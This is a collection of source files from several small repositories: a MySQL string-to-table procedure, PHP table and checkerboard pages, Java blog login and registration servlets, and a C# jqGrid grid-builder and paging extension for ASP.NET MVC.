{'table_type': 'weekly', '$range_type': 'WEEK', '$frequency_version': DATA_VERSION, '$country': 'US'},
{'table_type': 'monthly', '$range_type': 'MONTH', '$frequency_version': DATA_VERSION, '$country': 'US'}
],
'vpn_sample_usage_model_selected_devices_o.schema': [
{'table_type': 'weekly', '$range_type': 'WEEK', '$country': 'US'},
{'table_type': 'monthly', '$range_type': 'MONTH', '$country': 'US'}
]
}<file_sep>/int-vs-m-benchmark/sql/ios/1000a1-initialize-generic_string_list_to_table_procedure.sql
/*
DESCRIPTION:
general procedure to convert a string_list to a table
INPUT VARIABLES:
string_list, table_name and date_type
OUTPUT:
output table specified by table_name
REQUIRED PROCEDURES:
none
ALGORITHM STEPS:
1. create output table
2. insert string_list elements in output table
*/
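/*
EXAMPLE USAGE (illustrative; $process_id is substituted before deployment):
CALL generic_string_list_to_table_$process_id('2015-01-01,2015-02-01', 'tmp_dates', 'DATE');
-- yields temporary table tmp_dates with rows (1, '2015-01-01') and (2, '2015-02-01')
*/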
DROP PROCEDURE IF EXISTS `generic_string_list_to_table_$process_id`;
delimiter $$
CREATE
PROCEDURE `generic_string_list_to_table_$process_id`(
IN `string_list` TEXT, -- comma-separated string representing a list of elements
IN `table_name` TEXT, -- name of the output table
IN `date_type` TEXT -- SQL data type of the elements in the output table
)
LANGUAGE SQL
DETERMINISTIC
MODIFIES SQL DATA
SQL SECURITY DEFINER
COMMENT ''
BEGIN
DECLARE iteration INT;
/*
1. create output table
*/
SET @prepare_drop_table_stmnt = CONCAT(
'DROP TEMPORARY TABLE IF EXISTS ',table_name);
PREPARE drop_table_stmnt FROM @prepare_drop_table_stmnt;
EXECUTE drop_table_stmnt;
SET @prepare_create_table_stmnt = CONCAT(
'CREATE TEMPORARY TABLE ',table_name,'(
id INT,
element ',date_type,',
CONSTRAINT PRIMARY KEY (id),
INDEX element_index (element))'
);
PREPARE create_table_stmnt FROM @prepare_create_table_stmnt;
EXECUTE create_table_stmnt;
/*
2. iterate over string_list and insert elements into output table
*/
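-- Worked example of the extraction below (MySQL semantics):
-- SUBSTRING_INDEX(SUBSTRING_INDEX('a,b,c', ',', 2), ',', -1) = 'b',
-- i.e. keep the first N comma-separated parts, then take the last of them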
IF not(string_list is null or string_list='') THEN
SET iteration = 1;
iteration_loop: LOOP
SET @prepare_insert_stmnt = CONCAT(
'INSERT INTO ',table_name,'
SELECT ',iteration,' as id, SUBSTRING_INDEX(SUBSTRING_INDEX(\'',string_list,'\',\',\',',iteration,'),\',\',-1)');
PREPARE insert_stmnt FROM @prepare_insert_stmnt;
EXECUTE insert_stmnt;
SET iteration = iteration + 1;
IF iteration > LENGTH(string_list) - LENGTH(REPLACE(string_list, ',', '')) + 1 THEN
LEAVE iteration_loop;
END IF;
END LOOP iteration_loop;
END IF;
END$$
delimiter ;
;
|
65b66154dd7d425ea1601251d9c89a8125e72450
|
[
"SQL",
"Markdown",
"INI",
"Python",
"Text",
"R",
"Shell"
] | 284
|
Shell
|
asutherland-aa/aa-data-science-alex-branch-test
|
16dead254d7ebedd056e1b508a73a81429093964
|
4e998ded625514ea749b1510dad21aa9a695b54d
|
refs/heads/master
|
<repo_name>chrisk3/php_misc<file_sep>/advanced2.php
<!DOCTYPE HTML>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="description" content="A really awesome site!">
<title>PHP Assignment</title>
<link rel="stylesheet" href="advanced2.css">
</head>
<body>
<table>
<?php
// Write a program that generates an HTML table that looks like an 8x8 checkerboard.
$row_cnt = 0;
$cell_cnt = 0;
for ($row = 1; $row < 9; $row++)
{
echo "<tr>";
for ($col = 1; $col < 9; $col++)
{
if ($cell_cnt % 2 == $row_cnt % 2)
{
echo "<td class='red'></td>";
}
else
{
echo "<td class='black'></td>";
}
$cell_cnt += 1;
}
echo "</tr>";
$row_cnt += 1;
}
?>
</table>
</body>
</html>
<file_sep>/advanced1.php
<!DOCTYPE HTML>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="description" content="A really awesome site!">
<title>PHP Assignment</title>
<link rel="stylesheet" href="advanced1.css">
</head>
<body>
<table>
<thead>
<th>User #</th>
<th>First Name</th>
<th>Last Name</th>
<th>Full Name</th>
<th>Full Name in Upper Case</th>
<th>Length of Name</th>
</thead>
<tbody>
<?php
// Create a program that outputs an HTML table given a multidimensional, associative array
$users = array(
array('first_name' => 'Michael', 'last_name' => ' Choi '),
array('first_name' => 'John', 'last_name' => 'Supsupin'),
array('first_name' => 'Mark', 'last_name' => ' Guillen'),
array('first_name' => 'KB', 'last_name' => 'Tonel'),
array('first_name' => 'Chris', 'last_name' => 'Kaundart'),
array('first_name' => 'Dexter', 'last_name' => 'Clark'),
array('first_name' => 'Aaron', 'last_name' => 'Young'),
array('first_name' => 'Dan', 'last_name' => 'Basinski'),
array('first_name' => 'Randall', 'last_name' => 'Frisk'),
array('first_name' => 'Matt', 'last_name' => 'Barkley'),
array('first_name' => 'Andrew', 'last_name' => 'Luck'),
array('first_name' => 'Dennis', 'last_name' => 'Dixon'),
array('first_name' => 'Nick', 'last_name' => 'Foles'),
array('first_name' => 'Marcus', 'last_name' => 'Mariota'),
array('first_name' => 'Kevin', 'last_name' => 'Hogan')
);
$id = 1;
foreach ($users as $user) {
$first = trim($user['first_name']);
$last = trim($user['last_name']);
$full = $first . " " . $last;
echo "<tr";
if ($id % 5 == 0) {
echo " class='bg'";
}
echo "><td>" . $id . "</td>";
foreach ($user as $key => $value) {
$value = trim($value);
echo "<td>" . $value . "</td>";
}
echo "<td>" . $full . "</td>";
echo "<td>" . strtoupper($full) . "</td>";
echo "<td>" . strlen($full) . "</td>";
echo "</tr>";
$id += 1;
}
?>
</tbody>
</table>
</body>
</html>
|
5c8b455ba6f6a08b188e863b967dfa4f388e24c7
|
[
"PHP"
] | 2
|
PHP
|
chrisk3/php_misc
|
334e9e0545b3efbde861ceb3c8359c96c49ee0a9
|
846c5590289b9191e7c734efaf8486f493a0ff2d
|
refs/heads/master
|
<repo_name>fengbujues/BlogTestProjectByJSP<file_sep>/src/org/blog/controller/registServlet.java
package org.blog.controller;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
@WebServlet("/regist/*")
public class registServlet extends BaseServlet {
public void test(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
System.out.println("执行registservlet的test方法");
}
public void regist(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
System.out.println("执行registservlet的regist方法");
}
}
<file_sep>/src/org/blog/controller/adminServlet.java
package org.blog.controller;
import org.blog.dao.daoimpl.AdminDAOImp;
import org.blog.entity.Admin;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpSession;
import java.io.IOException;
import java.io.PrintWriter;
import java.sql.*;
@WebServlet("/adminServlet")
public class adminServlet extends javax.servlet.http.HttpServlet {
private AdminDAOImp daoImp=null;
@Override
public void init() throws ServletException {
daoImp = new AdminDAOImp();
}
protected void doPost(javax.servlet.http.HttpServletRequest request, javax.servlet.http.HttpServletResponse response) throws javax.servlet.ServletException, IOException {
String mothed = request.getParameter("mothed");
StringBuffer url = request.getRequestURL();
System.out.println("访问地址:"+url);
String queryString = request.getQueryString();
System.out.println("附加参数:"+queryString);
login(request,response);
System.out.println("登陆:"+mothed);
// switch (mothed){
// case "login":login(request,response);break;
// }
}
protected void doGet(javax.servlet.http.HttpServletRequest request, javax.servlet.http.HttpServletResponse response) throws javax.servlet.ServletException, IOException {
doPost(request,response);
}
protected void login(javax.servlet.http.HttpServletRequest request, javax.servlet.http.HttpServletResponse response) throws javax.servlet.ServletException, IOException {
String username = (String) request.getParameter("username");
String password = (String) request.getParameter("password");
Admin admin = daoImp.login(username, password);
PrintWriter writer = response.getWriter();
if (admin!=null){
writer.print("true");
HttpSession session = request.getSession();
session.setAttribute("admin",admin);
response.sendRedirect("views/homepage.jsp");
}else{
writer.print("false");
}
writer.flush();
writer.close();
// daoImp.closeAll();
}
}
|
74e1580dd2c76db0edfc73ea2873597ac323d134
|
[
"Java"
] | 2
|
Java
|
fengbujues/BlogTestProjectByJSP
|
4136735f4994b163006db594df14978336a11d88
|
9c5743e58d2a3d93e55c8e29b5d584a9785abbd0
|
refs/heads/develop
|
<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension enums
*****************************************************/
using System;
namespace HalowerHub.JqGrid
{
[Flags]
public enum GridOperators
{
Add = 1,
Edit = 2,
Delete = 4,
Search = 16,
Refresh = 32
}
}<file_sep>namespace HalowerHub.JqGrid
{
public enum CellFormatters
{
Integer,
Number,
Currency,
Date,
Email,
Showlink,
Checkbox
}
}
<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension enums
*****************************************************/
namespace HalowerHub.JqGrid
{
public enum Directions
{
Ltr,
Rtl
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-03-21
** Description: jqGrid paging parameters
*****************************************************/
using System.Web.Mvc;
namespace HalowerHub.JqGrid
{
public class PageParams
{
public int PageIndex { get; set; }
public int PageSize { get; set; }
public string Gridkey { get; set; }
public string SortName { get; set; }
public string Displayfileds { get; set; }
public string SearchField { get; set; }
public string SearchString { get; set; }
public string SearchOper { get; set; }
public string Filters { get; set; }
public string Sord { get; set; }
}
public static class RequestHelper
{
public static PageParams InitRequestParams(Controller baseContent)
{
var pageParams = new PageParams
{
PageIndex = int.Parse(baseContent.Request["page"] ?? "0"),
PageSize = int.Parse(baseContent.Request["rows"] ?? "0"),
SortName = baseContent.Request["sidx"],
Displayfileds = baseContent.Request["displayfileds"],
SearchField = baseContent.Request["searchField"],
SearchString = baseContent.Request["searchString"],
SearchOper = baseContent.Request["searchOper"],
Filters = baseContent.Request["filters"],
Sord = baseContent.Request["sord"],
Gridkey = baseContent.Request["gridKey"]
};
return pageParams;
}
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension
*****************************************************/
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class ColSPanConfiguation
{
[JsonProperty("useColSpanStyle")]
public bool UseColSpanStyle
{
get; set;
}
[JsonProperty("groupHeaders")]
public GroupHeader[] GroupHeaders { get; set; }
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension
** Modified: 2015-08-22
*****************************************************/
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Diagnostics;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Web;
using RazorEngine;
using RazorEngine.Configuration;
using RazorEngine.Templating;
using RazorEngine.Text;
namespace HalowerHub.JqGrid
{
public class GridGenerator<T> : IHtmlString
{
#region Properties
private GridConfiguration GridConfiguration { get; }
#endregion
#region Constructors
public GridGenerator()
{
GridConfiguration = new GridConfiguration();
}
public GridGenerator(string gridId)
: this()
{
_gridId = gridId;
}
public GridGenerator(string gridId, GridConfiguration gridConfiguration)
: this(gridId)
{
GridConfiguration = gridConfiguration;
}
#endregion
#region Fields
private readonly string _gridId;
#endregion
#region Main methods
/// <summary>
/// Enable paging
/// </summary>
/// <param name="pagerId">Pager element id</param>
/// <param name="hasPager"></param>
/// <returns></returns>
public GridGenerator<T> Pager(string pagerId = null, bool hasPager = true)
{
if (GridConfiguration.SubGridRowExpanded != null)
throw new Exception("子表格不需要指定pagerId");
GridConfiguration.PagerId = hasPager ? pagerId ?? "pagerId" : null;
return this;
}
/// <summary>
/// URL used to fetch grid data
/// </summary>
/// <param name="postUrl">URL used to fetch grid data</param>
/// <param name="postData">Extra data posted with the request</param>
/// <param name="tabKeyName">Primary key name</param>
/// <returns></returns>
public GridGenerator<T> Url(string postUrl, Dictionary<string, string> postData = null, string tabKeyName = null)
{
GridConfiguration.Url = postUrl;
if (tabKeyName != null)
{
postUrl = tabKeyName == "row_id" ? postUrl + "/" : postUrl + "?" + tabKeyName + "=";
GridConfiguration.Url = postUrl + $"{"\""}+{"row_id"}&";
}
if (postData == null)
{
postData = new Dictionary<string, string>();
}
postData.Add("displayFileds", string.Join(",", GridConfiguration.GridColumns.Select(c => c.Field).Where(f => !string.IsNullOrEmpty(f))));
if (string.IsNullOrEmpty(GridConfiguration.GridKey))
throw new Exception("请指定表格标识列");
postData.Add("gridkey", GridConfiguration.GridKey);
GridConfiguration.PostData = postData;
return this;
}
/// <summary>
/// Fetch data
/// </summary>
/// <param name="postUrl">URL used to fetch grid data</param>
/// <param name="tabKname">Main table primary key</param>
/// <param name="postData">Extra data posted with the request</param>
/// <param name="passPTabKey">Whether to pass the parent table key as a parameter</param>
/// <returns></returns>
public GridGenerator<T> Url(string postUrl, bool passPTabKey, string tabKname, Dictionary<string, string> postData = null)
{
return passPTabKey ? Url(postUrl, postData, tabKname ?? "row_id") : Url(postUrl, postData);
}
/// <summary>
/// Fetch data
/// </summary>
/// <param name="postUrl">URL used to fetch grid data</param>
/// <param name="passPTabKey">Whether to pass the parent table key as a parameter</param>
public GridGenerator<T> Url(string postUrl, bool passPTabKey)
{
return Url(postUrl, passPTabKey, null);
}
/// <summary>
/// Set the URL used to submit edited data
/// </summary>
/// <param name="editUrl">URL used to submit edited data</param>
public GridGenerator<T> EditUrl(string editUrl)
{
GridConfiguration.EditUrl = editUrl;
return this;
}
/// <summary>
/// Grid caption
/// </summary>
/// <param name="caption">Grid caption</param>
/// <returns></returns>
public GridGenerator<T> Caption(string caption)
{
GridConfiguration.Caption = caption;
return this;
}
/// <summary>
/// A drop-down used to change the number of records shown; the selection overrides the rowNum parameter posted to the server
/// </summary>
/// <param name="rowslist">Records-per-page options</param>
/// <returns></returns>
public GridGenerator<T> RowList(params int[] rowslist)
{
GridConfiguration.RowList = rowslist;
return this;
}
/// <summary>
/// Default sort column; may be a column name or an index, and is posted to the server
/// </summary>
/// <param name="sortName">Sort column</param>
/// <returns></returns>
public GridGenerator<T> SortName(string sortName)
{
GridConfiguration.SortName = sortName;
return this;
}
/// <summary>
/// Text direction of the grid
/// </summary>
/// <param name="direction">Text direction</param>
/// <returns></returns>
public GridGenerator<T> Direction(Directions direction)
{
GridConfiguration.Direction = direction.ToString().ToLower();
return this;
}
/// <summary>
/// Initial sort order when reading XML or JSON data from the server
/// </summary>
/// <param name="sortOrderType">Sort order</param>
/// <returns></returns>
public GridGenerator<T> SortOrder(SortOrders sortOrderType = SortOrders.Desc)
{
GridConfiguration.Sortorder = sortOrderType.ToString().ToLower();
return this;
}
/// <summary>
/// Text shown while requesting and sorting data
/// </summary>
/// <param name="loadtext">Text to display</param>
/// <returns></returns>
public GridGenerator<T> LoadText(string loadtext)
{
GridConfiguration.LoadText = loadtext;
return this;
}
/// <summary>
/// Whether the pager has a page-number input box
/// </summary>
/// <param name="haspginput">Show the page-number input box</param>
/// <returns></returns>
public GridGenerator<T> PgInput(bool haspginput = true)
{
GridConfiguration.PgInput = haspginput;
return this;
}
/// <summary>
/// When true, the grid width automatically fits the width of the parent element
/// </summary>
/// <param name="autowidth">Auto-fit the width</param>
/// <returns></returns>
public GridGenerator<T> AutoWidth(bool autowidth = true)
{
GridConfiguration.AutoWidth = autowidth;
return this;
}
/// <summary>
/// When true, data coming from the server and submitted data are encoded, e.g. <![CDATA[< is converted to &lt;]]>
/// </summary>
/// <param name="autoEncode">Enable encoding</param>
/// <returns></returns>
public GridGenerator<T> AutoEencode(bool? autoEncode)
{
GridConfiguration.AutoEencode = autoEncode;
return this;
}
/// <summary>
/// Grid complete event
/// </summary>
/// <param name="gridCompleteFunc"></param>
/// <returns></returns>
public GridGenerator<T> GridComplete(string gridCompleteFunc)
{
GridConfiguration.GridComplete = "&"+ gridCompleteFunc + "&";
return this;
}
/// <summary>
/// Row select event
/// </summary>
/// <param name="onSelectRowFunc"></param>
/// <returns></returns>
public GridGenerator<T> OnSelectRow(string onSelectRowFunc)
{
GridConfiguration.OnSelectRow = "&" + onSelectRowFunc + "&";
return this;
}
/// <summary>
/// Select-all event
/// </summary>
/// <param name="onSelectAllFunc"></param>
/// <returns></returns>
public GridGenerator<T> OnSelectAll(string onSelectAllFunc)
{
GridConfiguration.OnSelectAll = "&" + onSelectAllFunc + "&";
return this;
}
/// <summary>
/// The type of data the grid expects to receive
/// </summary>
/// <param name="dataTypes">Data type</param>
/// <returns></returns>
public GridGenerator<T> DataType(ResponseDatas dataTypes)
{
GridConfiguration.DataType = dataTypes.ToString().ToLower();
return this;
}
/// <summary>
/// Message shown when the number of returned (or current) records is zero; only effective when viewrecords is set to true
/// </summary>
/// <param name="emptyrecords">Message shown when there are no records</param>
/// <returns></returns>
public GridGenerator<T> EmptyRecords(string emptyrecords)
{
GridConfiguration.EmptyRecords = emptyrecords;
return this;
}
/// <summary>
/// Grid height; may be a number, a percentage, or auto
/// </summary>
/// <param name="height">Height</param>
/// <returns></returns>
public GridGenerator<T> Height(string height)
{
GridConfiguration.Height = height;
return this;
}
/// <summary>
/// When true, enables multi-row selection and shows checkboxes
/// </summary>
/// <param name="multiselect">Show checkboxes</param>
/// <returns></returns>
public GridGenerator<T> Multiselect(bool multiselect = true)
{
GridConfiguration.Multiselect = multiselect;
return this;
}
/// <summary>
/// Sub-grid data request URL
/// </summary>
/// <param name="url">Data request URL</param>
/// <param name="gridKey">gridKey</param>
/// <returns></returns>
public GridGenerator<T> SubGridUrl(string url, string gridKey)
{
GridConfiguration.SubGrid = true;
var displayFileds = string.Join(",", GridConfiguration.SubGridModel[0].GridColumns.Select(c => c.Field).Where(f => !string.IsNullOrEmpty(f)));
if (!url.Contains("?") && !url.EndsWith("\\") && string.IsNullOrEmpty(GridConfiguration.SubGridRowExpanded))
GridConfiguration.SubGridUrl = url + "?gridKey=" + gridKey + "&displayfileds=" + displayFileds;
return this;
}
/// <summary>
/// Main grid column configuration
/// </summary>
/// <param name="gridColumns">Columns to display</param>
/// <returns></returns>
public GridGenerator<T> MainGrid(params IGridColumn[] gridColumns)
{
GridConfiguration.GridColumns = gridColumns.ToList();
return this;
}
/// <summary>
/// Enable multi-field (advanced) search
/// </summary>
/// <param name="multisearh">Enable advanced search</param>
/// <returns></returns>
public GridGenerator<T> MultiSearch(bool multisearh = true)
{
GridConfiguration.MultiSearch = multisearh;
return this;
}
/// <summary>
/// Sub-grid column configuration
/// </summary>
/// <param name="gridColumns">Columns to display</param>
/// <returns></returns>
public GridGenerator<T> SubGrid(params GridColumn[] gridColumns)
{
GridConfiguration.SubGridModel = new[] { new SubGridTable(gridColumns) };
return this;
}
/// <summary>
/// Sub-grid configuration
/// </summary>
/// <param name="gridTable">Sub-grid</param>
/// <param name="hassubPager"></param>
/// <returns></returns>
public GridGenerator<T> SubGridAsGrid(GridGenerator<T> gridTable, bool hassubPager = false)
{
GridConfiguration.SubGrid = true;
var sb = new StringBuilder("&function(subgrid_id, row_id){");
sb.Append("var subgrid_pager_id=subgrid_id + '_pgr';");
sb.Append("var subgrid_table_id = subgrid_id+'_t';");
sb.Append($"jQuery('#'+subgrid_id).html(\"<table id='\" + subgrid_table_id + \"'class='scroll'></table>{(hassubPager ? "<div id='\" + subgrid_pager_id + \"'class='scroll'></div>" : "")}\");");
sb.Append("jQuery('#'+subgrid_table_id).jqGrid(");
sb.Append(gridTable.GridConfiguration.IgnoreNullSerialize());
sb.Append(" pager: subgrid_pager_id");
sb.Append(" });}&");
GridConfiguration.SubGridRowExpanded = sb.ToString()
.Replace("\"&", "")
.Replace("&\"", "")
.Replace("} pager:", ", pager:");
return this;
}
/// <summary>
/// Populate a form as the sub-grid
/// </summary>
/// <param name="url">Request URL</param>
/// <param name="pTabKeyName">Main table key</param>
/// <returns></returns>
public GridGenerator<T> SubGridAsForm(string url, string pTabKeyName = null)
{
GridConfiguration.SubGrid = true;
var baseUrl = string.IsNullOrEmpty(pTabKeyName) ? url + "/" : url + "?" + pTabKeyName + "=";
const string templete = @"&function(subgrid_id, row_id){var subgrid_table_id = subgrid_id+'_t';jQuery.get('@baseUrl'+row_id, function(result) {jQuery('#'+subgrid_id).empty().html(result)});}&";
GridConfiguration.SubGridRowExpanded =
templete.Replace("@baseUrl", baseUrl).Replace("\"&", "").Replace("&\"", "");
return this;
}
/// <summary>
/// Configure the grid as a tree grid
/// </summary>
/// <param name="expandColumn">Expand (tree) column</param>
/// <param name="treeIcon">Tree leaf icon</param>
/// <returns></returns>
public GridGenerator<T> AsTreeGrid(string expandColumn, string treeIcon = "ui-icon-document-b")
{
GridConfiguration.TreeGrid = true;
GridConfiguration.TreeGridModel = "adjacency";
GridConfiguration.ExpandColumn = expandColumn;
GridConfiguration.TreeIcons = "&{leaf:'" + treeIcon + "'}&";
return this;
}
/// <summary>
/// Set the grid key
/// </summary>
/// <param name="gridKey">Grid primary key</param>
/// <returns></returns>
public GridGenerator<T> GridKey(string gridKey)
{
GridConfiguration.GridKey = gridKey;
return this;
}
/// <summary>
/// Clear the cache before rendering (recommended during development)
/// </summary>
/// <returns></returns>
public GridGenerator<T> PerClearCache()
{
GridConfiguration.PerClearCache = true;
return this;
}
/// <summary>
/// Enable built-in operation types
/// </summary>
/// <param name="gridOperatorTypes">Built-in operation types</param>
/// <returns></returns>
public GridGenerator<T> BuiltInOperation(GridOperators gridOperatorTypes)
{
if (gridOperatorTypes.HasFlag(GridOperators.Add))
GridConfiguration.GridOperation.Add = true;
if (gridOperatorTypes.HasFlag(GridOperators.Edit))
GridConfiguration.GridOperation.Edit = true;
if (gridOperatorTypes.HasFlag(GridOperators.Delete))
GridConfiguration.GridOperation.Delete = true;
if (gridOperatorTypes.HasFlag(GridOperators.Search))
GridConfiguration.GridOperation.Search = true;
if (gridOperatorTypes.HasFlag(GridOperators.Refresh))
GridConfiguration.GridOperation.Refresh = true;
return this;
}
/// <summary>
/// Configure operation icons and text
/// </summary>
/// <param name="operationIcontext"></param>
/// <returns></returns>
public GridGenerator<T> OperationIconText(GridOperation operationIcontext)
{
GridConfiguration.GridOperation = operationIcontext;
return this;
}
/// <summary>
/// Group headers
/// </summary>
/// <param name="groupHeaders"></param>
/// <returns></returns>
public GridGenerator<T> GroupHeaders(params GroupHeader[] groupHeaders)
{
GridConfiguration.GroupHeaders = true;
GridConfiguration.ColSPanConfiguation.UseColSpanStyle = true;
GridConfiguration.ColSPanConfiguation.GroupHeaders = groupHeaders;
return this;
}
/// <summary>
/// Generate the grid HTML
/// </summary>
/// <returns></returns>
public string ToHtmlString()
{
var cacheValue = GridConfiguration.PerClearCache ? null : CacheHelper.Get("JqGird_Config_" + _gridId);
if (cacheValue != null)
{
return cacheValue.ToString().Replace("\"&", "").Replace("&\"", "").Replace("\\", "");
}
string template = @"
<!--This grid was generated automatically by HalowerHub.JqGrid; contact QQ:121625933-->
<table id='@Model.GridId'></table>
<div id ='@Model.PagerId'></div >
<script type='text/javascript'>
jQuery(function(){
@Model.TableInitCommand
@Model.BottomNavBarInitCommand
@Model.GroupHeaderInitCommand
@Model.MergerColumnInitCommand
});
</script>";
var initCommand = new RenderInitCommand();
initCommand.GridId = _gridId;
initCommand.GroupHeaderInitCommand= GridConfiguration.GroupHeaders? "jQuery('#" + _gridId + "').jqGrid('setGroupHeaders'," +GridConfiguration.ColSPanConfiguation.IgnoreNullSerialize() + ")": "";
initCommand.TableInitCommand = "jQuery('#" + _gridId + "').jqGrid("+GridConfiguration.IgnoreNullSerialize()+")";
initCommand.PagerId = GridConfiguration.PagerId?.Substring(1);
var colNames = GridConfiguration.GridColumns.Where(col => col.CellAttr != null).ToList();
if (colNames.Any())
{
GridConfiguration.GridComplete = @"&function() {" + colNames.Aggregate("", (current, col) => current + ("Merger(\'" + _gridId + "\', \'" + col.Field + "\');")) + "}&";
initCommand.MergerColumnInitCommand = "function Merger(gridName, cellName) { var mya = $('#' + gridName + '').getDataIDs(); var length = mya.length;for (var i = 0; i < length; i++){ var before = $('#' + gridName + '').jqGrid('getRowData', mya[i]); var rowSpanTaxCount = 1; for (j = i + 1; j <= length; j++) { var end = $('#' + gridName + '').jqGrid('getRowData', mya[j]); if (before[cellName] == end[cellName]) { rowSpanTaxCount++;$('#' + gridName + '').setCell(mya[j], cellName, '', { display: 'none' }); } else { rowSpanTaxCount = 1; break; }$('td[aria-describedby=' + gridName +'_' + cellName +']', '#' + gridName +'').eq(i).attr('rowspan', rowSpanTaxCount);}}};";
}
initCommand.BottomNavBarInitCommand= "$('#" + _gridId + "').jqGrid( 'navGrid' , '#"+ initCommand.PagerId + "'," + GridConfiguration.GridOperation.IgnoreNullSerialize() + ",{},{},{},{" + (GridConfiguration.MultiSearch ? "multipleSearch:true" : "") + "},{});";
var config = new TemplateServiceConfiguration {EncodedStringFactory = new RawStringFactory()};
var service = RazorEngineService.Create(config);
var result = service.RunCompile(template,"templateKey", typeof(RenderInitCommand), initCommand);
CacheHelper.Add("JqGird_Config_" + _gridId, result, 5);
return result.Replace("\"&", "").Replace("&\"", "").Replace("\\", "");
}
#endregion
}
}
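// Illustrative fluent usage (hypothetical model, URL and columns; GridColumn
// construction is elided since that type is defined elsewhere):
//
// var grid = new GridGenerator<Product>("productGrid")
//     .GridKey("Id")                  // must be set before Url(), which validates it
//     .MainGrid(/* IGridColumn[] */)  // must be set before Url(), which reads the column fields
//     .Url("/Product/List")           // appends displayFileds and gridkey to postData
//     .Pager("#productPager")         // the '#' prefix is stripped by ToHtmlString when rendering
//     .BuiltInOperation(GridOperators.Search | GridOperators.Refresh);
//
// Since GridGenerator<T> implements IHtmlString, rendering @grid in a Razor
// view emits the table, the pager div and the jqGrid init script.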
<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension sub-grid table
*****************************************************/
using System.Collections.Generic;
using System.Linq;
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class SubGridTable
{
public SubGridTable(params GridColumn[] subGridConfig)
{
var columns = new List<GridColumn>();
columns.AddRange(subGridConfig);
GridColumns = columns;
}
[JsonIgnore]
public List<GridColumn> GridColumns { get; set; }
#region Properties
[JsonProperty("url")]
public string Url { get; set; }
[JsonProperty("name")]
public string[] ColNames
{
get { return GridColumns.ToList().Select(c => c.DisplayName).ToArray(); }
}
[JsonProperty("width")]
public int[] ColWidths
{
get { return GridColumns.ToList().Select(c => c.Width ?? 20).ToArray(); }
}
[JsonProperty("align")]
public string[] Aligns
{
get { return GridColumns.ToList().Select(c => c.Align ?? "right").ToArray(); }
}
#endregion
}
}<file_sep>/****************************************************
** Author: Halower (QQ:121625933)
** Created: 2015-02-01
** Description: jqGrid extension paging
*****************************************************/
using System;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Text;
using System.Web.Mvc;
namespace HalowerHub.JqGrid
{
public static class GridPagerExtension
{
/// <summary>
/// Paginate an IQueryable
/// </summary>
/// <typeparam name="T">Entity type</typeparam>
/// <param name="list">Data set</param>
/// <param name="baseContent">Controller instance</param>
/// <param name="filter">Filter expression</param>
/// <param name="order">Order expression</param>
/// <returns></returns>
public static string Pagination<T>(this IQueryable<T> list, Controller baseContent, Expression<Func<T, bool>> filter = null, Expression<Func<T, object>> order = null) where T : class
{
var pageParams = RequestHelper.InitRequestParams(baseContent);
var predicate = PredicateBuilder.True<T>();
if (filter != null) predicate = predicate.And(filter);
if (!string.IsNullOrEmpty(pageParams.Filters))
predicate = GridSearchPredicate.MultiSearchExpression<T>(pageParams.Filters);
if (string.IsNullOrEmpty(pageParams.Filters) && !string.IsNullOrEmpty(pageParams.SearchField))
predicate = GridSearchPredicate.SingleSearchExpression<T>(pageParams.SearchField, pageParams.SearchOper,pageParams.SearchString);
var temp = list.Where(predicate.Compile()).ToList();
var compare = new GridListSort<T>(string.IsNullOrEmpty(pageParams.SortName) ? pageParams.Gridkey : pageParams.SortName, pageParams.Sord == "desc");
temp.Sort(compare.Compare);
var recordes = temp.Skip((pageParams.PageIndex - 1)*pageParams.PageSize).Take(pageParams.PageSize).ToList();
var gridCells = recordes.Select(p => new GridCell
{
Id = p.GetType().GetProperty(pageParams.Gridkey).GetValue(p, null).ToString(),
Cell = GetObjectPropertyValues(p, pageParams.Displayfileds.Split(','))
}).ToList();
var result =
new
{
pageParams.PageIndex,
records = temp.Count(predicate.Compile()),
rows = gridCells,
total = (Math.Ceiling((double)temp.Count() / pageParams.PageSize))
}.ToSerializer();
return result;
}
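// Illustrative controller usage (hypothetical action and data context):
//
// public string ProductList()
// {
//     return _db.Products.Pagination(this, p => p.Price > 0);
// }
//
// The paging, sorting and search parameters are read from the request by
// RequestHelper.InitRequestParams.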
/// <summary>
/// Paginate an IEnumerable
/// </summary>
/// <typeparam name="T"></typeparam>
/// <param name="list"></param>
/// <param name="baseContent"></param>
/// <param name="expression"></param>
/// <returns></returns>
public static string Pagination<T>(this IEnumerable<T> list, Controller baseContent,
Expression<Func<T, bool>> expression = null) where T : class
{
return Pagination(list.AsQueryable(), baseContent, expression);
}
/// <summary>
/// Push data to a sub-grid
/// </summary>
/// <param name="list"></param>
/// <param name="baseContent"></param>
/// <typeparam name="T"></typeparam>
/// <returns></returns>
public static string PushSubGrid<T>(this IEnumerable<T> list, Controller baseContent) where T : class
{
var pageParams = RequestHelper.InitRequestParams(baseContent);
var gridCells = list.Select(p => new GridCell
{
Id = p.GetType().GetProperty(pageParams.Gridkey).GetValue(p, null).ToString(),
Cell = GetObjectPropertyValues(p, pageParams.Displayfileds.Split(','))
}).ToList();
var result = new { rows = gridCells }.ToSerializer();
return result;
}
private static string[] GetObjectPropertyValues<T>(T t, IEnumerable<string> filderSortOrder)
{
var type = typeof(T);
